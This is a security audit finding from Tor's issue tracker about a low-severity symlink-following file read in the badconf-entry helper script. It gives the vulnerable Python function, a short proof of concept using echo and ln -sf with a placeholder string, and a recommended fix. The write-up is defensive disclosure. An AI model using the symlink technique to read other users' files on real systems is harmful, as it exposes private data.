TOR-014 pen-torproject#14: helper-scripts - Limited File Read in badconf-entry due to insecure Fingerprint validation via symlinks
Due to insufficient validation of fingerprints and the following symlinks, low-privileged attackers on the same system can leak content from other files.
added ~7001 ~4424 labels
changed the description
Author Maintainer
Technical Description
The load_args_as_fp function
reads a file via the open
and prints each line via the print
function, which has exactly 40 characters and does not start with a #
. Due to the insufficient validation of the fingerprint and the following symlinks, a low-privileged attacker could potentially leak sensitive information.
helper-scripts/util.py
def load_args_as_fp(args, fps):
# Try to load the filename as arg.
if len(args) > 1:
filename = args[1]
if os.path.exists(filename):
print("[+] Using file %s..." % (filename))
with open(filename, "r") as fd:
for line in fd:
line = line.strip()
# Ignore commented fingerprint
if line.startswith("#"):
continue
if len(line) != 40:
continue;
if line not in fps:
fps.append(line)
print(" [+] Adding %s" % (line))
Proof of Concept
1. Create leak file `echo -e "B\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nC" > leak_me`
2. Symlink file `ln -sf leak_me fps.txt`
3. Run vulnerable script `python3 badconf-entry.py fps.txt`
Output with leaked string AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The string is leaked on stdout and within the file approved-routers.d/approved-routers.conf
[+] Tor documents loaded successfully
- 6925 relays in consensus
- 7188 server descriptors
- 2204 bridge descriptors published in the last day
[+] Using file fps.txt...
[+] Adding AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
No AuthDirReject rules to create...
Continuing with !reject rules.
Author Maintainer
Impact
Low-privileged users may be able to leak sensitive data from files depending on the configuration of the system. Since only lines of length 40 of a file are printed, being a limited attacker scenario, this vulnerability has been rated as Low.
Author Maintainer
Recommendation
Validate the fingerprint with the regular expression ^[0-9A-Fa-f]{40}$
or use stem and don't follow symlinks.
Author Maintainer
Type
CWE-61: UNIX Symbolic Link (Symlink) Following